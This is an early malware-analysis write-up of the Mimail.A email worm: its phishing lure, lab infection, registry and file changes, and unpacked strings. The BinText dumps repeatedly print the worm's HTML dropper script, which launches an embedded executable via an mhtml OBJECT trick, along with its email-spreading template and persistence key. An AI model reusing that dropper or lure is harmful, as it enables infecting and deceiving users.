A Closer Look at the Worm_Mimail.A
Overview
On August 1, 2003, I encountered several emails from my email admin account informing me that my email address will be expiring and that I should read an attachment for further details. Being suspicious, I analyzed that file and the affects of it. This is a short overview of what I have found so far.
Table of Contents
A Closer Look at the Worm_Mimail.A
The Delivery
This particular infection comes in the form of an email and requires users to open the email, unzip an html file, and launch it in Internet Explorer. Figure 1 is a snapshot of that email.
Figure 1:email message
The Tools
Each description is taken from the vendor for your reference.
BinText
A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format.
Vendor: Foundstone
TDIMON
TDImon is an application that lets you monitor TCP and UDP activity on your local system. It is the most powerful tool available for tracking down network-related configuration problems and analyzing application network usage.
Vendor: Sysinternals
URL: http://www.sysinternals.com/ntw2k/freeware/tdimon.shtml
Regmon
Regmon is a Registry monitoring utility that will show you which applications are accessing your Registry, which keys they are accessing, and the Registry data that they are reading and writing - all in real-time. This advanced utility takes you one step beyond what static Registry tools can do, to let you see and understand exactly how programs use the Registry. With static tools you might be able to see what Registry values and keys changed. With Regmon you'll see how the values and keys changed.
Vendor: Sysinternals
URL: http://www.sysinternals.com/ntw2k/source/regmon.shtml
Filemon
Filemon monitors and displays file system activity on a system in real-time. Its advanced capabilities make it a powerful tool for exploring the way Windows works, seeing how applications use the files and DLLs, or tracking down problems in system or application file configurations. Filemon's timestamping feature will show you precisely when every open, read, write or delete, happens, and its status column tells you the outcome. Filemon is so easy to use that you'll be an expert within minutes. It begins monitoring when you start it, and its output window can be saved to a file for off-line viewing. It has full search capability, and if you find that you're getting information overload, simply set up one or more filters.
Vendor: Sysinternal
URL: http://www.sysinternals.com/ntw2k/source/filemon.shtml
Regshot
Regshot allows you to take a snapshot of the registry, save it, perform what ever tasks you like, and take another snapshot. The value in this little application is that you can compare the shots taken, before and after, and analyze the differences.
Vendor: regshot.ist.md
UPX
UPX is a free, portable, extendable, high-performance executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression. Your executables suffer no memory overhead or other drawbacks.
Vendor: UPX
URL: http://upx.sourceforge.net/
Preparation
A default Windows XP system running inside VMWare environment was used as the test lab. Regomon, Filemon, TDI were started and left running before infection. A registry snapshot was taken using Regshot. Once this was complete, and a quick look at the processes running on the system
Infection
The email was opened, the zip file was unzipped, and the HTML file was double clicked. Figure 2 is a screen shot of the html page. Note the bottom information bar indicating something is happening.
Figure 2: Screen Shot of Installation
During the installation, a process called ‘Videodrv.exe’ can be seen running.
Figure 3:Videodrv.exe
After about 5 minutes, an error message appeared on the screen. The error message can be seen in Figure 4.
Figure 4:Error Message
When this error message occurred, the HTML window message that commented on installing the components disappeared, hinting that the application was complete.
There were no other visible instances that the system had been infected.
A Closer look at HTML
Running Bintext or simply opening the HTML file in an editor produced some readable lines of instructions, but for the most part, was encrypted. Some key lines that were visible included:
- Content-Location:File://foo.exe
- Content-Transfer-Encoding: binary
- document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
Take note of the file foo.exe and “moo ha ha” lines. Are these important? Appendix A is a complete BINTEXT of the HTML file in its original format.
What is Videodrv.exe
When the virus was launched, there was a process called videodrv.exe. A closer look at the process could reveal additional information and can be seen in Figure 4.
Figure 4:videodrv.exe 2
Regshot was able to identify the following changes between the scan before infection, and the scan after:
C:\WINDOWS\exe.tmp
C:\WINDOWS\videodrv.exe
C:\WINDOWS\zip.tmp
This identifies 3 new files added to the target system that we can examine in more detail. The Videodrv file was the primary file as seen in Process Explorer. Running Bintext on the executable displayed a lot of un-intelligible garbage. The file was obviously encrypted as well.
UPX is the next tool that was used to try and decrypt the executable and hopefully reveal the inner workings of this executable and the infection. UPX was successful in decrypting the executable! So now we ran Bintext against it again and got a clear view of the application. For a clear view of the text, see Appendix B.
In the text, we could identify the following:
- Software\Microsoft\Windows\CurrentVersion\Run\videodrv.exe
- \eml.tmp
- \exe.tmp
- \zip.tmp
- 212.5.86.163
The final point of this analysis is the identifying of the email text we saw in the original email that started the investigation.
0000589D 00474A9D 0 From: %s
000058A6 00474AA6 0 To: %s
000058AD 00474AAD 0 Reply-To: %s
000058C2 00474AC2 0 RCPT TO:<%s>
000058D1 00474AD1 0 MAIL FROM:<%s>
000058E2 00474AE2 0 HELO localhost
000058F7 00474AF7 0 admin@
000058FE 00474AFE 0 ----------%s
0000590B 00474B0B 0 %.8X%.8X
00005914 00474B14 0 X-Mailer: The Bat! (v1.61)
0000592F 00474B2F 0 X-Priority: 2 (High)
00005944 00474B44 0 Subject: your account %s
00005975 00474B75 0 MIME-Version: 1.0
00005987 00474B87 0 Content-Type: multipart/mixed; boundary="%s"
000059BA 00474BBA 0 Content-Type: text/plain; charset=us-ascii
000059E5 00474BE5 0 Content-Transfer-Encoding: 7bit
00005A07 00474C07 0 Hello there,
00005A15 00474C15 0 I would like to inform you about important information regarding your
00005A5B 00474C5B 0 email address. This email address will be expiring.
00005A8F 00474C8F 0 Please read attachment for details.
00005AB8 00474CB8 0 Best regards, Administrator
00005ADD 00474CDD 0 Content-Type: application/x-zip-compressed; name="message.zip"
00005B1C 00474D1C 0 Content-Transfer-Encoding: base64
00005B3E 00474D3E 0 Content-Disposition: attachment; filename="message.zip"
00005B7B 00474D7B 0 --%s—
Further analysis will be completed at a later date!
Appendix A
File pos Mem pos ID Text
======== ======= == ====
00000000 00000000 0 MIME-Version: 1.0
00000012 00000012 0 Content-Location:File://foo.exe
00000032 00000032 0 Content-Transfer-Encoding: binary
000000A2 000000A2 0 !This program cannot be run in DOS mode.
00000340 00000340 0 /t:VU
00000354 00000354 0 (x1%Sr
00000663 00000663 0 [vxf.
000007DE 000007DE 0 u#);sG
00000892 00000892 0 dgeQW
0000096E 0000096E 0 KF8"t!*
0000097E 0000097E 0 H1!9lF
00000AAE 00000AAE 0 =aS S
00000D85 00000D85 0 X= c%
00000DAF 00000DAF 0 N \$(S#
00001034 00001034 0 {*_h
00001074 00001074 0 W 7C3
0000120D 0000120D 0 $2V)mXl!
0000165F 0000165F 0 J xA xo
00001684 00001684 0 f t|0
000016E8 000016E8 0 nw7Gm
0000171D 0000171D 0 , 'QG
00001947 00001947 0 }f@'WY
00001982 00001982 0 SJ6]@
0000199A 0000199A 0 (sdsC
00001A80 00001A80 0 14,Q/
00001BE7 00001BE7 0 <Ar'<
00001BF5 00001BF5 0 <\t.<
00001C27 00001C27 0 kNAlS;!v$k
00001D36 00001D36 0 XY@6n
00001E56 00001E56 0 2 (,2
00001F48 00001F48 0 ABCDEFG
00001F53 00001F53 0 HIJKLMNOPQRSTUVWXYZabcdefghijklm
00001F77 00001F77 0 nopqrstuvwxyz0123456789+/
00001F91 00001F91 0 awerio
00001F9D 00001F9D 0 pasafihokozavbnmc@
00001FB3 00001FB3 0 oe.aea7
00001FCA 00001FCA 0 SOKGC
00001FD3 00001FD3 0 ?;73/M
00001FDA 00001FDA 0 4M+'#
00001FE7 00001FE7 0 v@.15
00001FF1 00001FF1 0 <body bgcolor=black scr
00002012 00002012 0 <SCRIPT
0000201A 0000201A 0 funct
00002025 00002025 0 malw
00002031 00002031 0 s=document.URL
00002045 00002045 0 th=s.subcr(-0,
0000205D 0000205D 0 xOf("\\"));
0000206D 0000206D 0 -NefapG
00002087 00002087 0 tle>M&Hge</
000020A2 000020A2 0 FONT f
000020A9 000020A9 0 e="AG
000020E8 000020E8 0 t-0ze
000020EE 000020EE 0 2px;">Num
000020FF 000020FF 0 wOBJECT
00002114 00002114 0 &-hair
00002128 00002128 0 CLASSID
00002148 00002148 0 nEJhtml:'+=+'X
00002177 00002177 0 }etTi/o
00002190 00002190 0 [ipt>
00002196 00002196 0 MIME-V
File pos Mem pos ID Text
======== ======= == ====
0000219D 0000219D 0 s) 1.0
000021B6 000021B6 0 Transf9-
000021D2 000021D2 0 VidyDav
000021DF 000021DF 0 on}\Mi*n
000021EB 000021EB 0 \Wxows\CArJ
000021FF 000021FF 0 \v:drvk
0000220B 0000220B 0 =C:\P5gkm
0000223E 0000223E 0 \e%.)
00002249 00002249 0 xezipRegis
00002267 00002267 0 l32.dw
00002273 00002273 0 apd 5]n
00002281 00002281 0 '%s'WF-m
00002295 00002295 0 6Nply-
000022C8 000022C8 0 MXbDa
000022E6 000022E6 0 LINEw1
00002337 00002337 0 \ShGl
00002350 00002350 0 45-3li
00002382 00002382 0 psh[h
00002388 00002388 0 [Lx"x
000023BD 000023BD 0 5.8636<2
000023CF 000023CF 0 5QUIT
000023E4 000023E4 0 GDATA$RCP-{
00002404 00002404 0 HELO
0000242F 0000242F 0 B6! (v
000024A5 000024A5 0 iiM7b
000024DF 000024DF 0 Y;gxfh
00002564 00002564 0 64!D{
000025F1 000025F1 0 hXZl+
0000261F 0000261F 0 <HPU;\
0000265F 0000265F 0 (8DP\p4M
000026A8 000026A8 0 ,8DA$
000026B5 000026B5 0 BJvvc
000026BC 000026BC 0 U6p"4LG
000026D6 000026D6 0 fF}bH
000026DF 000026DF 0 q+VdH
000026F4 000026F4 0 nGCa(
0000271A 0000271A 0 wK[FC
00002722 00002722 0 Jz/I7@
00002744 00002744 0 +{RA7ZT
00002751 00002751 0 [+LWOD@.
000027BF 000027BF 0 ToDosDat
000027E3 000027E3 0 GetCom
000027FE 000027FE 0 H ?Cll
00002832 00002832 0 Yopymv
00002850 00002850 0 tlUn
0000288A 0000288A 0 EnumValuwg
000028A5 000028A5 0 S?']A2
000028B0 000028B0 0 _KMgth
000028DC 000028DC 0 .Ppctf
000028F4 000028F4 0 cp,r[
00002910 00002910 0 <ymppy
0000291C 0000291C 0 n(n!n"
00002958 00002958 0 sPs2KL"
000029E6 000029E6 0 WSAnLZ
00002A12 00002A12 0 [hton
00002D6D 00002D6D 0 KERNEL32.DLL
00002D7A 00002D7A 0 ADVAPI32.DLL
00002D87 00002D87 0 CRTDLL.DLL
00002D92 00002D92 0 GDI32.DLL
00002D9C 00002D9C 0 iphlpapi.DLL
File pos Mem pos ID Text
======== ======= == ====
00002DA9 00002DA9 0 ole32.DLL
00002DB3 00002DB3 0 OLEAUT32.DLL
00002DC0 00002DC0 0 USER32.DLL
00002DCB 00002DCB 0 wsock32.dll
00002DD9 00002DD9 0 LoadLibraryA
00002DE7 00002DE7 0 GetProcAddress
00002DF7 00002DF7 0 ExitProcess
00002E05 00002E05 0 RegCloseKey
00002E19 00002E19 0 GetStockObject
00002E29 00002E29 0 GetNetworkParams
00002E3B 00002E3B 0 CoInitialize
00002E49 00002E49 0 SysAllocString
00002E59 00002E59 0 SetTimer
00003075 00003075 0 <body bgcolor=black scroll=no>
00003094 00003094 0 <SCRIPT>
0000309D 0000309D 0 function malware()
000030B2 000030B2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000030E8 000030E8 0 path=unescape(path);
000030FD 000030FD 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00003267 00003267 0 setTimeout("malware()",150)
00003284 00003284 0 </script><body bgcolor=black scroll=no>
000032AC 000032AC 0 <SCRIPT>
000032B5 000032B5 0 function malware()
000032CA 000032CA 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00003300 00003300 0 path=unescape(path);
00003315 00003315 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000347F 0000347F 0 setTimeout("malware()",150)
0000349C 0000349C 0 </script><body bgcolor=black scroll=no>
000034C4 000034C4 0 <SCRIPT>
000034CD 000034CD 0 function malware()
000034E2 000034E2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00003518 00003518 0 path=unescape(path);
0000352D 0000352D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00003697 00003697 0 setTimeout("malware()",150)
000036B4 000036B4 0 </script><body bgcolor=black scroll=no>
000036DC 000036DC 0 <SCRIPT>
000036E5 000036E5 0 function malware()
000036FA 000036FA 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00003730 00003730 0 path=unescape(path);
00003745 00003745 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
000038AF 000038AF 0 setTimeout("malware()",150)
000038CC 000038CC 0 </script><body bgcolor=black scroll=no>
000038F4 000038F4 0 <SCRIPT>
000038FD 000038FD 0 function malware()
00003912 00003912 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00003948 00003948 0 path=unescape(path);
0000395D 0000395D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00003AC7 00003AC7 0 setTimeout("malware()",150)
00003AE4 00003AE4 0 </script><body bgcolor=black scroll=no>
00003B0C 00003B0C 0 <SCRIPT>
00003B15 00003B15 0 function malware()
00003B2A 00003B2A 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00003B60 00003B60 0 path=unescape(path);
00003B75 00003B75 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00003CDF 00003CDF 0 setTimeout("malware()",150)
00003CFC 00003CFC 0 </script><body bgcolor=black scroll=no>
00003D24 00003D24 0 <SCRIPT>
00003D2D 00003D2D 0 function malware()
00003D42 00003D42 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00003D78 00003D78 0 path=unescape(path);
File pos Mem pos ID Text
======== ======= == ====
00003D8D 00003D8D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00003EF7 00003EF7 0 setTimeout("malware()",150)
00003F14 00003F14 0 </script><body bgcolor=black scroll=no>
00003F3C 00003F3C 0 <SCRIPT>
00003F45 00003F45 0 function malware()
00003F5A 00003F5A 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00003F90 00003F90 0 path=unescape(path);
00003FA5 00003FA5 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000410F 0000410F 0 setTimeout("malware()",150)
0000412C 0000412C 0 </script><body bgcolor=black scroll=no>
00004154 00004154 0 <SCRIPT>
0000415D 0000415D 0 function malware()
00004172 00004172 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000041A8 000041A8 0 path=unescape(path);
000041BD 000041BD 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00004327 00004327 0 setTimeout("malware()",150)
00004344 00004344 0 </script><body bgcolor=black scroll=no>
0000436C 0000436C 0 <SCRIPT>
00004375 00004375 0 function malware()
0000438A 0000438A 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000043C0 000043C0 0 path=unescape(path);
000043D5 000043D5 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000453F 0000453F 0 setTimeout("malware()",150)
0000455C 0000455C 0 </script><body bgcolor=black scroll=no>
00004584 00004584 0 <SCRIPT>
0000458D 0000458D 0 function malware()
000045A2 000045A2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000045D8 000045D8 0 path=unescape(path);
000045ED 000045ED 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00004757 00004757 0 setTimeout("malware()",150)
00004774 00004774 0 </script><body bgcolor=black scroll=no>
0000479C 0000479C 0 <SCRIPT>
000047A5 000047A5 0 function malware()
000047BA 000047BA 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000047F0 000047F0 0 path=unescape(path);
00004805 00004805 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000496F 0000496F 0 setTimeout("malware()",150)
0000498C 0000498C 0 </script><body bgcolor=black scroll=no>
000049B4 000049B4 0 <SCRIPT>
000049BD 000049BD 0 function malware()
000049D2 000049D2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00004A08 00004A08 0 path=unescape(path);
00004A1D 00004A1D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00004B87 00004B87 0 setTimeout("malware()",150)
00004BA4 00004BA4 0 </script>
Appendix B
File pos Mem pos ID Text
======== ======= == ====
0000004D 0040004D 0 !This program cannot be run in DOS mode.
00000178 00400178 0 .text
000001C8 004001C8 0 .data
000001F0 004001F0 0 .idata
0000044A 0040104A 0 t ;t$$t
0000047D 0040107D 0 SVWUj
00001E4D 00402A4D 0 <>.u"
000026FB 004032FB 0 Wh<IG
000040AA 00404CAA 0 9=0y@
0000470B 0040530B 0 s3A<-t
00004722 00405322 0 <Ar'<
00004730 00405330 0 <\t.<
0000477D 0040537D 0 v$<-t
00004787 00405387 0 <0r><9v
0000478F 0040538F 0 <Ar6<[r
0000479D 0040539D 0 t*<zv
00004829 00405429 0 <@t%<.u
0000486B 0040546B 0 tn;t$
000049B1 004055B1 0 ?"u#j"
00004E5A 0047405A 0 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
00004E9B 0047409B 0 aweriouiopasafihokozavbnmcabcdefghijklmnopqrstuvwxyzoeioaearieao
0000532C 0047452C 0 abcdefghijklmnopqrstuvwxyz@.15
0000534C 0047454C 0 <body bgcolor=black scroll=no>
0000536B 0047456B 0 <SCRIPT>
00005374 00474574 0 function malware()
00005389 00474589 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000053BF 004745BF 0 path=unescape(path);
000053D4 004745D4 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000553E 0047473E 0 setTimeout("malware()",150)
0000555B 0047475B 0 </script>
00005565 00474765 0 MIME-Version: 1.0
00005577 00474777 0 Content-Location:File://foo.exe
00005597 00474797 0 Content-Transfer-Encoding: binary
000055BB 004747BB 0 VideoDriver
000055C7 004747C7 0 Software\Microsoft\Windows\CurrentVersion\Run
000055F5 004747F5 0 \videodrv.exe
00005605 00474805 0 C:\Program Files\
00005617 00474817 0 www.google.com
0000562A 0047482A 0 Error creating window
00005641 00474841 0 \eml.tmp
0000564A 0047484A 0 \exe.tmp
00005653 00474853 0 \zip.tmp
0000565C 0047485C 0 RegisterServiceProcess
00005673 00474873 0 kernel32.dll
00005680 00474880 0 Failed to connect: '%s'
00005699 00474899 0 From: %s
000056A2 004748A2 0 To: <%s>
000056AB 004748AB 0 Reply-To: <%s>
000056BA 004748BA 0 Subject: %s
000056C8 004748C8 0 %s %d
000056CE 004748CE 0 hostent() error: %d
000056E3 004748E3 0 Lookup failed
000056F2 004748F2 0 MX: '%s'
000056FC 004748FC 0 Domain: '%s'
0000570A 0047490A 0 c:\tmpe.tmp
00005724 00474924 0 LINE %d
0000572D 0047492D 0 Line %d: %s
0000578A 0047498A 0 Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
000057CB 004749CB 0 Failed to open '%s'
000057E0 004749E0 0 Memory allocation error, file %s, size %d
File pos Mem pos ID Text
======== ======= == ====
0000580B 00474A0B 0 Read error
00005873 00474A73 0 212.5.86.163
0000589D 00474A9D 0 From: %s
000058A6 00474AA6 0 To: %s
000058AD 00474AAD 0 Reply-To: %s
000058C2 00474AC2 0 RCPT TO:<%s>
000058D1 00474AD1 0 MAIL FROM:<%s>
000058E2 00474AE2 0 HELO localhost
000058F7 00474AF7 0 admin@
000058FE 00474AFE 0 ----------%s
0000590B 00474B0B 0 %.8X%.8X
00005914 00474B14 0 X-Mailer: The Bat! (v1.61)
0000592F 00474B2F 0 X-Priority: 2 (High)
00005944 00474B44 0 Subject: your account %s
00005975 00474B75 0 MIME-Version: 1.0
00005987 00474B87 0 Content-Type: multipart/mixed; boundary="%s"
000059BA 00474BBA 0 Content-Type: text/plain; charset=us-ascii
000059E5 00474BE5 0 Content-Transfer-Encoding: 7bit
00005A07 00474C07 0 Hello there,
00005A15 00474C15 0 I would like to inform you about important information regarding your
00005A5B 00474C5B 0 email address. This email address will be expiring.
00005A8F 00474C8F 0 Please read attachment for details.
00005AB8 00474CB8 0 Best regards, Administrator
00005ADD 00474CDD 0 Content-Type: application/x-zip-compressed; name="message.zip"
00005B1C 00474D1C 0 Content-Transfer-Encoding: base64
00005B3E 00474D3E 0 Content-Disposition: attachment; filename="message.zip"
00005B7B 00474D7B 0 --%s--
00005B89 00474D89 0 message.html
0000605A 0047545A 0 SysAllocString
0000606E 0047546E 0 CoCreateInstance
00006082 00475482 0 CLSIDFromString
00006096 00475496 0 CoInitialize
000060A6 004754A6 0 CoUninitialize
000060BA 004754BA 0 WSAGetLastError
000060CE 004754CE 0 WSAStartup
000060DE 004754DE 0 closesocket
000060EE 004754EE 0 connect
000060FA 004754FA 0 gethostbyname
0000610A 0047550A 0 htons
00006112 00475512 0 inet_addr
0000611E 0047551E 0 ioctlsocket
0000612E 0047552E 0 ntohs
0000613E 0047553E 0 select
00006152 00475552 0 socket
0000615E 0047555E 0 GetNetworkParams
00006172 00475572 0 FileTimeToDosDateTime
0000618A 0047558A 0 FindFirstFileA
0000619E 0047559E 0 FindNextFileA
000061AE 004755AE 0 FormatMessageA
000061C2 004755C2 0 GetCommandLineA
000061D6 004755D6 0 GetFileSize
000061E6 004755E6 0 GetModuleHandleA
000061FA 004755FA 0 CloseHandle
0000620A 0047560A 0 GetProcAddress
0000621E 0047561E 0 GetSystemTimeAsFileTime
0000623A 0047563A 0 GetTickCount
0000624A 0047564A 0 GetWindowsDirectoryA
00006262 00475662 0 CopyFileA
0000626E 0047566E 0 LoadLibraryA
0000627E 0047567E 0 CreateFileA
File pos Mem pos ID Text
======== ======= == ====
0000628E 0047568E 0 ReadFile
0000629A 0047569A 0 RtlUnwind
000062A6 004756A6 0 RtlZeroMemory
000062B6 004756B6 0 Sleep
000062BE 004756BE 0 TerminateThread
000062D2 004756D2 0 WinExec
000062DE 004756DE 0 CreateThread
000062EE 004756EE 0 DeleteFileA
000062FE 004756FE 0 GetWindowTextA
00006312 00475712 0 GetForegroundWindow
0000632A 0047572A 0 LoadCursorA
0000633A 0047573A 0 LoadIconA
00006346 00475746 0 SetTimer
00006352 00475752 0 KillTimer
0000635E 0047575E 0 RegisterClassA
00006372 00475772 0 MessageBoxA
00006382 00475782 0 GetMessageA
00006392 00475792 0 TranslateMessage
000063A6 004757A6 0 DispatchMessageA
000063BA 004757BA 0 PostQuitMessage
000063CE 004757CE 0 CreateWindowExA
000063E2 004757E2 0 DefWindowProcA
000063F6 004757F6 0 GetStockObject
0000640A 0047580A 0 RegEnumValueA
0000641A 0047581A 0 RegCloseKey
0000642A 0047582A 0 RegOpenKeyA
0000643A 0047583A 0 RegSetValueExA
0000644E 0047584E 0 _filelength
0000645E 0047585E 0 _fileno
0000646A 0047586A 0 __GetMainArgs
00006482 00475882 0 fclose
0000648E 0047588E 0 fgets
00006496 00475896 0 fopen
0000649E 0047589E 0 fprintf
000064AA 004758AA 0 fread
000064BA 004758BA 0 fwrite
000064C6 004758C6 0 malloc
000064D2 004758D2 0 memcpy
000064DE 004758DE 0 printf
000064EA 004758EA 0 raise
000064F2 004758F2 0 signal
000064FE 004758FE 0 sprintf
0000650A 0047590A 0 strcat
00006516 00475916 0 strchr
00006522 00475922 0 strcmp
0000652E 0047592E 0 strcpy
0000653A 0047593A 0 strlen
00006546 00475946 0 strncat
00006552 00475952 0 strncmp
0000655E 0047595E 0 strncpy
00006567 00475967 0 AOLEAUT32.DLL
0000657C 0047597C 0 ole32.DLL
00006598 00475998 0 wsock32.dll
000065D8 004759D8 0 iphlpapi.DLL
000065E6 004759E6 0 y0<PG
000065EC 004759EC 0 KERNEL32.DLL
000065FA 004759FA 0 WePPG
00006658 00475A58 0 USER32.DLL
0000669C 00475A9C 0 GDI32.DLL
000066AC 00475AAC 0 ADVAPI32.DLL
File pos Mem pos ID Text
======== ======= == ====
000066CC 00475ACC 0 CRTDLL.DLL
00006820 00406820 0 <body bgcolor=black scroll=no>
0000683F 0040683F 0 <SCRIPT>
00006848 00406848 0 function malware()
0000685D 0040685D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00006893 00406893 0 path=unescape(path);
000068A8 004068A8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00006A12 00406A12 0 setTimeout("malware()",150)
00006A2F 00406A2F 0 </script><body bgcolor=black scroll=no>
00006A57 00406A57 0 <SCRIPT>
00006A60 00406A60 0 function malware()
00006A75 00406A75 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00006AAB 00406AAB 0 path=unescape(path);
00006AC0 00406AC0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00006C2A 00406C2A 0 setTimeout("malware()",150)
00006C47 00406C47 0 </script><body bgcolor=black scroll=no>
00006C6F 00406C6F 0 <SCRIPT>
00006C78 00406C78 0 function malware()
00006C8D 00406C8D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00006CC3 00406CC3 0 path=unescape(path);
00006CD8 00406CD8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
